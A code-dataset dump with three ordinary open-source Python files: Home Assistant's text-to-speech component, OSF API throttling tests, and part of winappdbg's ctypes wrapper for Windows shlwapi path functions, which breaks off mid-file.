repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
molobrakos/home-assistant | homeassistant/components/tts/__init__.py | 5 | 18394 | """Provide functionality to TTS."""
import asyncio
import ctypes
import functools as ft
import hashlib
import io
import logging
import mimetypes
import os
import re
from aiohttp import web
import voluptuous as vol
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.media_player.const import (
ATTR_MEDIA_CONTENT_ID, ATTR_MEDIA_CONTENT_TYPE, MEDIA_TYPE_MUSIC,
SERVICE_PLAY_MEDIA)
from homeassistant.components.media_player.const import DOMAIN as DOMAIN_MP
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, CONF_PLATFORM
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.setup import async_prepare_setup_platform
_LOGGER = logging.getLogger(__name__)
ATTR_CACHE = 'cache'
ATTR_LANGUAGE = 'language'
ATTR_MESSAGE = 'message'
ATTR_OPTIONS = 'options'
ATTR_PLATFORM = 'platform'
CONF_BASE_URL = 'base_url'
CONF_CACHE = 'cache'
CONF_CACHE_DIR = 'cache_dir'
CONF_LANG = 'language'
CONF_SERVICE_NAME = 'service_name'
CONF_TIME_MEMORY = 'time_memory'
DEFAULT_CACHE = True
DEFAULT_CACHE_DIR = 'tts'
DEFAULT_TIME_MEMORY = 300
DOMAIN = 'tts'
MEM_CACHE_FILENAME = 'filename'
MEM_CACHE_VOICE = 'voice'
SERVICE_CLEAR_CACHE = 'clear_cache'
SERVICE_SAY = 'say'
_RE_VOICE_FILE = re.compile(
r"([a-f0-9]{40})_([^_]+)_([^_]+)_([a-z_]+)\.[a-z0-9]{3,4}")
KEY_PATTERN = '{0}_{1}_{2}_{3}'
def _deprecated_platform(value):
"""Validate if platform is deprecated."""
if value == 'google':
raise vol.Invalid(
'google tts service has been renamed to google_translate,'
' please update your configuration.')
return value
PLATFORM_SCHEMA = cv.PLATFORM_SCHEMA.extend({
vol.Required(CONF_PLATFORM): vol.All(cv.string, _deprecated_platform),
vol.Optional(CONF_CACHE, default=DEFAULT_CACHE): cv.boolean,
vol.Optional(CONF_CACHE_DIR, default=DEFAULT_CACHE_DIR): cv.string,
vol.Optional(CONF_TIME_MEMORY, default=DEFAULT_TIME_MEMORY):
vol.All(vol.Coerce(int), vol.Range(min=60, max=57600)),
vol.Optional(CONF_BASE_URL): cv.string,
vol.Optional(CONF_SERVICE_NAME): cv.string,
})
PLATFORM_SCHEMA_BASE = cv.PLATFORM_SCHEMA_BASE.extend(PLATFORM_SCHEMA.schema)
SCHEMA_SERVICE_SAY = vol.Schema({
vol.Required(ATTR_MESSAGE): cv.string,
vol.Optional(ATTR_CACHE): cv.boolean,
vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids,
vol.Optional(ATTR_LANGUAGE): cv.string,
vol.Optional(ATTR_OPTIONS): dict,
})
SCHEMA_SERVICE_CLEAR_CACHE = vol.Schema({})
async def async_setup(hass, config):
"""Set up TTS."""
tts = SpeechManager(hass)
try:
conf = config[DOMAIN][0] if config.get(DOMAIN, []) else {}
use_cache = conf.get(CONF_CACHE, DEFAULT_CACHE)
cache_dir = conf.get(CONF_CACHE_DIR, DEFAULT_CACHE_DIR)
time_memory = conf.get(CONF_TIME_MEMORY, DEFAULT_TIME_MEMORY)
base_url = conf.get(CONF_BASE_URL) or hass.config.api.base_url
await tts.async_init_cache(use_cache, cache_dir, time_memory, base_url)
except (HomeAssistantError, KeyError) as err:
_LOGGER.error("Error on cache init %s", err)
return False
hass.http.register_view(TextToSpeechView(tts))
hass.http.register_view(TextToSpeechUrlView(tts))
async def async_setup_platform(p_type, p_config, disc_info=None):
"""Set up a TTS platform."""
platform = await async_prepare_setup_platform(
hass, config, DOMAIN, p_type)
if platform is None:
return
try:
if hasattr(platform, 'async_get_engine'):
provider = await platform.async_get_engine(
hass, p_config)
else:
provider = await hass.async_add_job(
platform.get_engine, hass, p_config)
if provider is None:
_LOGGER.error("Error setting up platform %s", p_type)
return
tts.async_register_engine(p_type, provider, p_config)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error setting up platform: %s", p_type)
return
async def async_say_handle(service):
"""Service handle for say."""
entity_ids = service.data.get(ATTR_ENTITY_ID, ENTITY_MATCH_ALL)
message = service.data.get(ATTR_MESSAGE)
cache = service.data.get(ATTR_CACHE)
language = service.data.get(ATTR_LANGUAGE)
options = service.data.get(ATTR_OPTIONS)
try:
url = await tts.async_get_url(
p_type, message, cache=cache, language=language,
options=options
)
except HomeAssistantError as err:
_LOGGER.error("Error on init TTS: %s", err)
return
data = {
ATTR_MEDIA_CONTENT_ID: url,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_MUSIC,
ATTR_ENTITY_ID: entity_ids,
}
await hass.services.async_call(
DOMAIN_MP, SERVICE_PLAY_MEDIA, data, blocking=True)
service_name = p_config.get(CONF_SERVICE_NAME, "{}_{}".format(
p_type, SERVICE_SAY))
hass.services.async_register(
DOMAIN, service_name, async_say_handle,
schema=SCHEMA_SERVICE_SAY)
setup_tasks = [async_setup_platform(p_type, p_config) for p_type, p_config
in config_per_platform(config, DOMAIN)]
if setup_tasks:
await asyncio.wait(setup_tasks, loop=hass.loop)
async def async_clear_cache_handle(service):
"""Handle clear cache service call."""
await tts.async_clear_cache()
hass.services.async_register(
DOMAIN, SERVICE_CLEAR_CACHE, async_clear_cache_handle,
schema=SCHEMA_SERVICE_CLEAR_CACHE)
return True
class SpeechManager:
"""Representation of a speech store."""
def __init__(self, hass):
"""Initialize a speech store."""
self.hass = hass
self.providers = {}
self.use_cache = DEFAULT_CACHE
self.cache_dir = DEFAULT_CACHE_DIR
self.time_memory = DEFAULT_TIME_MEMORY
self.base_url = None
self.file_cache = {}
self.mem_cache = {}
async def async_init_cache(self, use_cache, cache_dir, time_memory,
base_url):
"""Init config folder and load file cache."""
self.use_cache = use_cache
self.time_memory = time_memory
self.base_url = base_url
def init_tts_cache_dir(cache_dir):
"""Init cache folder."""
if not os.path.isabs(cache_dir):
cache_dir = self.hass.config.path(cache_dir)
if not os.path.isdir(cache_dir):
_LOGGER.info("Create cache dir %s.", cache_dir)
os.mkdir(cache_dir)
return cache_dir
try:
self.cache_dir = await self.hass.async_add_job(
init_tts_cache_dir, cache_dir)
except OSError as err:
raise HomeAssistantError("Can't init cache dir {}".format(err))
def get_cache_files():
"""Return a dict of given engine files."""
cache = {}
folder_data = os.listdir(self.cache_dir)
for file_data in folder_data:
record = _RE_VOICE_FILE.match(file_data)
if record:
key = KEY_PATTERN.format(
record.group(1), record.group(2), record.group(3),
record.group(4)
)
cache[key.lower()] = file_data.lower()
return cache
try:
cache_files = await self.hass.async_add_job(get_cache_files)
except OSError as err:
raise HomeAssistantError("Can't read cache dir {}".format(err))
if cache_files:
self.file_cache.update(cache_files)
async def async_clear_cache(self):
"""Read file cache and delete files."""
self.mem_cache = {}
def remove_files():
"""Remove files from filesystem."""
for _, filename in self.file_cache.items():
try:
os.remove(os.path.join(self.cache_dir, filename))
except OSError as err:
_LOGGER.warning(
"Can't remove cache file '%s': %s", filename, err)
await self.hass.async_add_job(remove_files)
self.file_cache = {}
@callback
def async_register_engine(self, engine, provider, config):
"""Register a TTS provider."""
provider.hass = self.hass
if provider.name is None:
provider.name = engine
self.providers[engine] = provider
async def async_get_url(self, engine, message, cache=None, language=None,
options=None):
"""Get URL for play message.
This method is a coroutine.
"""
provider = self.providers[engine]
msg_hash = hashlib.sha1(bytes(message, 'utf-8')).hexdigest()
use_cache = cache if cache is not None else self.use_cache
# Languages
language = language or provider.default_language
if language is None or \
language not in provider.supported_languages:
raise HomeAssistantError("Not supported language {0}".format(
language))
# Options
if provider.default_options and options:
merged_options = provider.default_options.copy()
merged_options.update(options)
options = merged_options
options = options or provider.default_options
if options is not None:
invalid_opts = [opt_name for opt_name in options.keys()
if opt_name not in (provider.supported_options or
[])]
if invalid_opts:
raise HomeAssistantError(
"Invalid options found: {}".format(invalid_opts))
options_key = ctypes.c_size_t(hash(frozenset(options))).value
else:
options_key = '-'
key = KEY_PATTERN.format(
msg_hash, language, options_key, engine).lower()
# Is speech already in memory
if key in self.mem_cache:
filename = self.mem_cache[key][MEM_CACHE_FILENAME]
# Is file store in file cache
elif use_cache and key in self.file_cache:
filename = self.file_cache[key]
self.hass.async_create_task(self.async_file_to_mem(key))
# Load speech from provider into memory
else:
filename = await self.async_get_tts_audio(
engine, key, message, use_cache, language, options)
return "{}/api/tts_proxy/{}".format(self.base_url, filename)
async def async_get_tts_audio(
self, engine, key, message, cache, language, options):
"""Receive TTS and store for view in cache.
This method is a coroutine.
"""
provider = self.providers[engine]
extension, data = await provider.async_get_tts_audio(
message, language, options)
if data is None or extension is None:
raise HomeAssistantError(
"No TTS from {} for '{}'".format(engine, message))
# Create file infos
filename = ("{}.{}".format(key, extension)).lower()
data = self.write_tags(
filename, data, provider, message, language, options)
# Save to memory
self._async_store_to_memcache(key, filename, data)
if cache:
self.hass.async_create_task(
self.async_save_tts_audio(key, filename, data))
return filename
async def async_save_tts_audio(self, key, filename, data):
"""Store voice data to file and file_cache.
This method is a coroutine.
"""
voice_file = os.path.join(self.cache_dir, filename)
def save_speech():
"""Store speech to filesystem."""
with open(voice_file, 'wb') as speech:
speech.write(data)
try:
await self.hass.async_add_job(save_speech)
self.file_cache[key] = filename
except OSError:
_LOGGER.error("Can't write %s", filename)
async def async_file_to_mem(self, key):
"""Load voice from file cache into memory.
This method is a coroutine.
"""
filename = self.file_cache.get(key)
if not filename:
raise HomeAssistantError("Key {} not in file cache!".format(key))
voice_file = os.path.join(self.cache_dir, filename)
def load_speech():
"""Load a speech from filesystem."""
with open(voice_file, 'rb') as speech:
return speech.read()
try:
data = await self.hass.async_add_job(load_speech)
except OSError:
del self.file_cache[key]
raise HomeAssistantError("Can't read {}".format(voice_file))
self._async_store_to_memcache(key, filename, data)
@callback
def _async_store_to_memcache(self, key, filename, data):
"""Store data to memcache and set timer to remove it."""
self.mem_cache[key] = {
MEM_CACHE_FILENAME: filename,
MEM_CACHE_VOICE: data,
}
@callback
def async_remove_from_mem():
"""Cleanup memcache."""
self.mem_cache.pop(key)
self.hass.loop.call_later(self.time_memory, async_remove_from_mem)
async def async_read_tts(self, filename):
"""Read a voice file and return binary.
This method is a coroutine.
"""
record = _RE_VOICE_FILE.match(filename.lower())
if not record:
raise HomeAssistantError("Wrong tts file format!")
key = KEY_PATTERN.format(
record.group(1), record.group(2), record.group(3), record.group(4))
if key not in self.mem_cache:
if key not in self.file_cache:
raise HomeAssistantError("{} not in cache!".format(key))
await self.async_file_to_mem(key)
content, _ = mimetypes.guess_type(filename)
return (content, self.mem_cache[key][MEM_CACHE_VOICE])
@staticmethod
def write_tags(filename, data, provider, message, language, options):
"""Write ID3 tags to file.
Async friendly.
"""
import mutagen
data_bytes = io.BytesIO(data)
data_bytes.name = filename
data_bytes.seek(0)
album = provider.name
artist = language
if options is not None:
if options.get('voice') is not None:
artist = options.get('voice')
try:
tts_file = mutagen.File(data_bytes, easy=True)
if tts_file is not None:
tts_file['artist'] = artist
tts_file['album'] = album
tts_file['title'] = message
tts_file.save(data_bytes)
except mutagen.MutagenError as err:
_LOGGER.error("ID3 tag error: %s", err)
return data_bytes.getvalue()
class Provider:
"""Represent a single TTS provider."""
hass = None
name = None
@property
def default_language(self):
"""Return the default language."""
return None
@property
def supported_languages(self):
"""Return a list of supported languages."""
return None
@property
def supported_options(self):
"""Return a list of supported options like voice, emotionen."""
return None
@property
def default_options(self):
"""Return a dict include default options."""
return None
def get_tts_audio(self, message, language, options=None):
"""Load tts audio file from provider."""
raise NotImplementedError()
def async_get_tts_audio(self, message, language, options=None):
"""Load tts audio file from provider.
Return a tuple of file extension and data as bytes.
This method must be run in the event loop and returns a coroutine.
"""
return self.hass.async_add_job(
ft.partial(self.get_tts_audio, message, language, options=options))
class TextToSpeechUrlView(HomeAssistantView):
"""TTS view to get a url to a generated speech file."""
requires_auth = True
url = '/api/tts_get_url'
name = 'api:tts:geturl'
def __init__(self, tts):
"""Initialize a tts view."""
self.tts = tts
async def post(self, request):
"""Generate speech and provide url."""
try:
data = await request.json()
except ValueError:
return self.json_message('Invalid JSON specified', 400)
if not data.get(ATTR_PLATFORM) and data.get(ATTR_MESSAGE):
return self.json_message('Must specify platform and message', 400)
p_type = data[ATTR_PLATFORM]
message = data[ATTR_MESSAGE]
cache = data.get(ATTR_CACHE)
language = data.get(ATTR_LANGUAGE)
options = data.get(ATTR_OPTIONS)
try:
url = await self.tts.async_get_url(
p_type, message, cache=cache, language=language,
options=options
)
resp = self.json({'url': url}, 200)
except HomeAssistantError as err:
_LOGGER.error("Error on init tts: %s", err)
resp = self.json({'error': err}, 400)
return resp
class TextToSpeechView(HomeAssistantView):
"""TTS view to serve a speech audio."""
requires_auth = False
url = '/api/tts_proxy/{filename}'
name = 'api:tts:speech'
def __init__(self, tts):
"""Initialize a tts view."""
self.tts = tts
async def get(self, request, filename):
"""Start a get request."""
try:
content, data = await self.tts.async_read_tts(filename)
except HomeAssistantError as err:
_LOGGER.error("Error on load tts: %s", err)
return web.Response(status=404)
return web.Response(body=data, content_type=content)
| apache-2.0 |
pattisdr/osf.io | api_tests/base/test_throttling.py | 12 | 4553 | import pytest
import mock
from nose.tools import * # noqa:
from api.base.settings.defaults import API_BASE
from tests.base import ApiTestCase
from osf_tests.factories import AuthUserFactory, ProjectFactory
pytestmark = pytest.mark.skip(
'Unskip when throttling no longer fails on travis'
)
class TestDefaultThrottleClasses(ApiTestCase):
@mock.patch('api.base.throttling.BaseThrottle.get_ident')
def test_default_throttle_class_calls(self, mock_base):
base_url = '/{}nodes/'.format(API_BASE)
res = self.app.get(base_url)
assert_equal(res.status_code, 200)
assert_equal(mock_base.call_count, 2)
class TestRootThrottle(ApiTestCase):
def setUp(self):
super(TestRootThrottle, self).setUp()
self.url = '/{}'.format(API_BASE)
self.user = AuthUserFactory()
@mock.patch('api.base.throttling.RootAnonThrottle.allow_request')
def test_root_throttle_unauthenticated_request(self, mock_allow):
res = self.app.get(self.url)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
@mock.patch('rest_framework.throttling.UserRateThrottle.allow_request')
def test_root_throttle_authenticated_request(self, mock_allow):
res = self.app.get(self.url, auth=self.user.auth)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
class TestUserRateThrottle(ApiTestCase):
def setUp(self):
super(TestUserRateThrottle, self).setUp()
self.user = AuthUserFactory()
self.url = '/{}nodes/'.format(API_BASE)
@mock.patch('rest_framework.throttling.UserRateThrottle.allow_request')
def test_user_rate_allow_request_called(self, mock_allow):
res = self.app.get(self.url, auth=self.user.auth)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
class TestNonCookieAuthThrottle(ApiTestCase):
def setUp(self):
super(TestNonCookieAuthThrottle, self).setUp()
self.url = '/{}nodes/'.format(API_BASE)
@mock.patch('api.base.throttling.NonCookieAuthThrottle.allow_request')
def test_cookie_throttle_rate_allow_request_called(self, mock_allow):
res = self.app.get(self.url)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
class TestAddContributorEmailThrottle(ApiTestCase):
def setUp(self):
super(TestAddContributorEmailThrottle, self).setUp()
self.user = AuthUserFactory()
self.user_two = AuthUserFactory()
self.public_project = ProjectFactory(creator=self.user)
self.url = '/{}'.format(API_BASE)
self.public_url = '/{}nodes/{}/contributors/'.format(
API_BASE, self.public_project._id)
self.data_user_two = {
'data': {
'type': 'contributors',
'attributes': {
'bibliographic': True,
},
'relationships': {
'users': {
'data': {
'type': 'users',
'id': self.user_two._id,
}
}
}
}
}
@mock.patch('api.base.throttling.AddContributorThrottle.allow_request')
def test_add_contrib_throttle_rate_allow_request_not_called(
self, mock_allow):
res = self.app.get(self.url)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 0)
@mock.patch('api.base.throttling.AddContributorThrottle.allow_request')
def test_add_contrib_throttle_rate_allow_request_called(self, mock_allow):
res = self.app.post_json_api(
self.public_url,
self.data_user_two,
auth=self.user.auth)
assert_equal(res.status_code, 201)
assert_equal(mock_allow.call_count, 1)
@mock.patch('api.base.throttling.NonCookieAuthThrottle.allow_request')
@mock.patch('rest_framework.throttling.UserRateThrottle.allow_request')
@mock.patch('api.base.throttling.AddContributorThrottle.allow_request')
def test_add_contrib_throttle_rate_and_default_rates_called(
self, mock_contrib_allow, mock_user_allow, mock_anon_allow):
res = self.app.get(self.public_url, auth=self.user.auth)
assert_equal(res.status_code, 200)
assert_equal(mock_anon_allow.call_count, 1)
assert_equal(mock_user_allow.call_count, 1)
assert_equal(mock_contrib_allow.call_count, 1)
| apache-2.0 |
MER-GROUP/intellij-community | python/helpers/pydev/pydevd_attach_to_process/winappdbg/win32/shlwapi.py | 102 | 25807 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Wrapper for shlwapi.dll in ctypes.
"""
__revision__ = "$Id$"
from winappdbg.win32.defines import *
from winappdbg.win32.kernel32 import *
#==============================================================================
# This is used later on to calculate the list of exported symbols.
_all = None
_all = set(vars().keys())
#==============================================================================
OS_WINDOWS = 0
OS_NT = 1
OS_WIN95ORGREATER = 2
OS_NT4ORGREATER = 3
OS_WIN98ORGREATER = 5
OS_WIN98_GOLD = 6
OS_WIN2000ORGREATER = 7
OS_WIN2000PRO = 8
OS_WIN2000SERVER = 9
OS_WIN2000ADVSERVER = 10
OS_WIN2000DATACENTER = 11
OS_WIN2000TERMINAL = 12
OS_EMBEDDED = 13
OS_TERMINALCLIENT = 14
OS_TERMINALREMOTEADMIN = 15
OS_WIN95_GOLD = 16
OS_MEORGREATER = 17
OS_XPORGREATER = 18
OS_HOME = 19
OS_PROFESSIONAL = 20
OS_DATACENTER = 21
OS_ADVSERVER = 22
OS_SERVER = 23
OS_TERMINALSERVER = 24
OS_PERSONALTERMINALSERVER = 25
OS_FASTUSERSWITCHING = 26
OS_WELCOMELOGONUI = 27
OS_DOMAINMEMBER = 28
OS_ANYSERVER = 29
OS_WOW6432 = 30
OS_WEBSERVER = 31
OS_SMALLBUSINESSSERVER = 32
OS_TABLETPC = 33
OS_SERVERADMINUI = 34
OS_MEDIACENTER = 35
OS_APPLIANCE = 36
#--- shlwapi.dll --------------------------------------------------------------
# BOOL IsOS(
# DWORD dwOS
# );
def IsOS(dwOS):
try:
_IsOS = windll.shlwapi.IsOS
_IsOS.argtypes = [DWORD]
_IsOS.restype = bool
except AttributeError:
# According to MSDN, on Windows versions prior to Vista
# this function is exported only by ordinal number 437.
# http://msdn.microsoft.com/en-us/library/bb773795%28VS.85%29.aspx
_GetProcAddress = windll.kernel32.GetProcAddress
_GetProcAddress.argtypes = [HINSTANCE, DWORD]
_GetProcAddress.restype = LPVOID
_IsOS = windll.kernel32.GetProcAddress(windll.shlwapi._handle, 437)
_IsOS = WINFUNCTYPE(bool, DWORD)(_IsOS)
return _IsOS(dwOS)
# LPTSTR PathAddBackslash(
# LPTSTR lpszPath
# );
def PathAddBackslashA(lpszPath):
_PathAddBackslashA = windll.shlwapi.PathAddBackslashA
_PathAddBackslashA.argtypes = [LPSTR]
_PathAddBackslashA.restype = LPSTR
lpszPath = ctypes.create_string_buffer(lpszPath, MAX_PATH)
retval = _PathAddBackslashA(lpszPath)
if retval == NULL:
raise ctypes.WinError()
return lpszPath.value
def PathAddBackslashW(lpszPath):
_PathAddBackslashW = windll.shlwapi.PathAddBackslashW
_PathAddBackslashW.argtypes = [LPWSTR]
_PathAddBackslashW.restype = LPWSTR
lpszPath = ctypes.create_unicode_buffer(lpszPath, MAX_PATH)
retval = _PathAddBackslashW(lpszPath)
if retval == NULL:
raise ctypes.WinError()
return lpszPath.value
PathAddBackslash = GuessStringType(PathAddBackslashA, PathAddBackslashW)
# BOOL PathAddExtension(
# LPTSTR pszPath,
# LPCTSTR pszExtension
# );
def PathAddExtensionA(lpszPath, pszExtension = None):
_PathAddExtensionA = windll.shlwapi.PathAddExtensionA
_PathAddExtensionA.argtypes = [LPSTR, LPSTR]
_PathAddExtensionA.restype = bool
_PathAddExtensionA.errcheck = RaiseIfZero
if not pszExtension:
pszExtension = None
lpszPath = ctypes.create_string_buffer(lpszPath, MAX_PATH)
_PathAddExtensionA(lpszPath, pszExtension)
return lpszPath.value
def PathAddExtensionW(lpszPath, pszExtension = None):
_PathAddExtensionW = windll.shlwapi.PathAddExtensionW
_PathAddExtensionW.argtypes = [LPWSTR, LPWSTR]
_PathAddExtensionW.restype = bool
_PathAddExtensionW.errcheck = RaiseIfZero
if not pszExtension:
pszExtension = None
lpszPath = ctypes.create_unicode_buffer(lpszPath, MAX_PATH)
_PathAddExtensionW(lpszPath, pszExtension)
return lpszPath.value
PathAddExtension = GuessStringType(PathAddExtensionA, PathAddExtensionW)
# BOOL PathAppend(
# LPTSTR pszPath,
# LPCTSTR pszMore
# );
def PathAppendA(lpszPath, pszMore = None):
_PathAppendA = windll.shlwapi.PathAppendA
_PathAppendA.argtypes = [LPSTR, LPSTR]
_PathAppendA.restype = bool
_PathAppendA.errcheck = RaiseIfZero
if not pszMore:
pszMore = None
lpszPath = ctypes.create_string_buffer(lpszPath, MAX_PATH)
_PathAppendA(lpszPath, pszMore)
return lpszPath.value
def PathAppendW(lpszPath, pszMore = None):
_PathAppendW = windll.shlwapi.PathAppendW
_PathAppendW.argtypes = [LPWSTR, LPWSTR]
_PathAppendW.restype = bool
_PathAppendW.errcheck = RaiseIfZero
if not pszMore:
pszMore = None
lpszPath = ctypes.create_unicode_buffer(lpszPath, MAX_PATH)
_PathAppendW(lpszPath, pszMore)
return lpszPath.value
PathAppend = GuessStringType(PathAppendA, PathAppendW)
# LPTSTR PathCombine(
# LPTSTR lpszDest,
# LPCTSTR lpszDir,
# LPCTSTR lpszFile
# );
def PathCombineA(lpszDir, lpszFile):
_PathCombineA = windll.shlwapi.PathCombineA
_PathCombineA.argtypes = [LPSTR, LPSTR, LPSTR]
_PathCombineA.restype = LPSTR
lpszDest = ctypes.create_string_buffer("", max(MAX_PATH, len(lpszDir) + len(lpszFile) + 1))
retval = _PathCombineA(lpszDest, lpszDir, lpszFile)
if retval == NULL:
return None
return lpszDest.value
def PathCombineW(lpszDir, lpszFile):
_PathCombineW = windll.shlwapi.PathCombineW
_PathCombineW.argtypes = [LPWSTR, LPWSTR, LPWSTR]
_PathCombineW.restype = LPWSTR
lpszDest = ctypes.create_unicode_buffer(u"", max(MAX_PATH, len(lpszDir) + len(lpszFile) + 1))
retval = _PathCombineW(lpszDest, lpszDir, lpszFile)
if retval == NULL:
return None
return lpszDest.value
PathCombine = GuessStringType(PathCombineA, PathCombineW)
# BOOL PathCanonicalize(
# LPTSTR lpszDst,
# LPCTSTR lpszSrc
# );
def PathCanonicalizeA(lpszSrc):
_PathCanonicalizeA = windll.shlwapi.PathCanonicalizeA
_PathCanonicalizeA.argtypes = [LPSTR, LPSTR]
_PathCanonicalizeA.restype = bool
_PathCanonicalizeA.errcheck = RaiseIfZero
lpszDst = ctypes.create_string_buffer("", MAX_PATH)
_PathCanonicalizeA(lpszDst, lpszSrc)
return lpszDst.value
def PathCanonicalizeW(lpszSrc):
_PathCanonicalizeW = windll.shlwapi.PathCanonicalizeW
_PathCanonicalizeW.argtypes = [LPWSTR, LPWSTR]
_PathCanonicalizeW.restype = bool
_PathCanonicalizeW.errcheck = RaiseIfZero
lpszDst = ctypes.create_unicode_buffer(u"", MAX_PATH)
_PathCanonicalizeW(lpszDst, lpszSrc)
return lpszDst.value
PathCanonicalize = GuessStringType(PathCanonicalizeA, PathCanonicalizeW)
# BOOL PathRelativePathTo(
# _Out_ LPTSTR pszPath,
# _In_ LPCTSTR pszFrom,
# _In_ DWORD dwAttrFrom,
# _In_ LPCTSTR pszTo,
# _In_ DWORD dwAttrTo
# );
def PathRelativePathToA(pszFrom = None, dwAttrFrom = FILE_ATTRIBUTE_DIRECTORY, pszTo = None, dwAttrTo = FILE_ATTRIBUTE_DIRECTORY):
_PathRelativePathToA = windll.shlwapi.PathRelativePathToA
_PathRelativePathToA.argtypes = [LPSTR, LPSTR, DWORD, LPSTR, DWORD]
_PathRelativePathToA.restype = bool
_PathRelativePathToA.errcheck = RaiseIfZero
# Make the paths absolute or the function fails.
if pszFrom:
pszFrom = GetFullPathNameA(pszFrom)[0]
else:
pszFrom = GetCurrentDirectoryA()
if pszTo:
pszTo = GetFullPathNameA(pszTo)[0]
else:
pszTo = GetCurrentDirectoryA()
# Argh, this function doesn't receive an output buffer size!
# We'll try to guess the maximum possible buffer size.
dwPath = max((len(pszFrom) + len(pszTo)) * 2 + 1, MAX_PATH + 1)
pszPath = ctypes.create_string_buffer('', dwPath)
# Also, it doesn't set the last error value.
# Whoever coded it must have been drunk or tripping on acid. Or both.
# The only failure conditions I've seen were invalid paths, paths not
# on the same drive, or the path is not absolute.
SetLastError(ERROR_INVALID_PARAMETER)
_PathRelativePathToA(pszPath, pszFrom, dwAttrFrom, pszTo, dwAttrTo)
return pszPath.value
def PathRelativePathToW(pszFrom = None, dwAttrFrom = FILE_ATTRIBUTE_DIRECTORY, pszTo = None, dwAttrTo = FILE_ATTRIBUTE_DIRECTORY):
_PathRelativePathToW = windll.shlwapi.PathRelativePathToW
_PathRelativePathToW.argtypes = [LPWSTR, LPWSTR, DWORD, LPWSTR, DWORD]
_PathRelativePathToW.restype = bool
_PathRelativePathToW.errcheck = RaiseIfZero
# Refer to PathRelativePathToA to know why this code is so ugly.
if pszFrom:
pszFrom = GetFullPathNameW(pszFrom)[0]
else:
pszFrom = GetCurrentDirectoryW()
if pszTo:
pszTo = GetFullPathNameW(pszTo)[0]
else:
pszTo = GetCurrentDirectoryW()
dwPath = max((len(pszFrom) + len(pszTo)) * 2 + 1, MAX_PATH + 1)
pszPath = ctypes.create_unicode_buffer(u'', dwPath)
SetLastError(ERROR_INVALID_PARAMETER)
_PathRelativePathToW(pszPath, pszFrom, dwAttrFrom, pszTo, dwAttrTo)
return pszPath.value
PathRelativePathTo = GuessStringType(PathRelativePathToA, PathRelativePathToW)
# BOOL PathFileExists(
# LPCTSTR pszPath
# );
def PathFileExistsA(pszPath):
_PathFileExistsA = windll.shlwapi.PathFileExistsA
_PathFileExistsA.argtypes = [LPSTR]
_PathFileExistsA.restype = bool
return _PathFileExistsA(pszPath)
def PathFileExistsW(pszPath):
_PathFileExistsW = windll.shlwapi.PathFileExistsW
_PathFileExistsW.argtypes = [LPWSTR]
_PathFileExistsW.restype = bool
return _PathFileExistsW(pszPath)
PathFileExists = GuessStringType(PathFileExistsA, PathFileExistsW)
# LPTSTR PathFindExtension(
# LPCTSTR pszPath
# );
def PathFindExtensionA(pszPath):
_PathFindExtensionA = windll.shlwapi.PathFindExtensionA
_PathFindExtensionA.argtypes = [LPSTR]
_PathFindExtensionA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathFindExtensionA(pszPath)
def PathFindExtensionW(pszPath):
_PathFindExtensionW = windll.shlwapi.PathFindExtensionW
_PathFindExtensionW.argtypes = [LPWSTR]
_PathFindExtensionW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathFindExtensionW(pszPath)
PathFindExtension = GuessStringType(PathFindExtensionA, PathFindExtensionW)
# LPTSTR PathFindFileName(
# LPCTSTR pszPath
# );
def PathFindFileNameA(pszPath):
_PathFindFileNameA = windll.shlwapi.PathFindFileNameA
_PathFindFileNameA.argtypes = [LPSTR]
_PathFindFileNameA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathFindFileNameA(pszPath)
def PathFindFileNameW(pszPath):
_PathFindFileNameW = windll.shlwapi.PathFindFileNameW
_PathFindFileNameW.argtypes = [LPWSTR]
_PathFindFileNameW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathFindFileNameW(pszPath)
PathFindFileName = GuessStringType(PathFindFileNameA, PathFindFileNameW)
# LPTSTR PathFindNextComponent(
# LPCTSTR pszPath
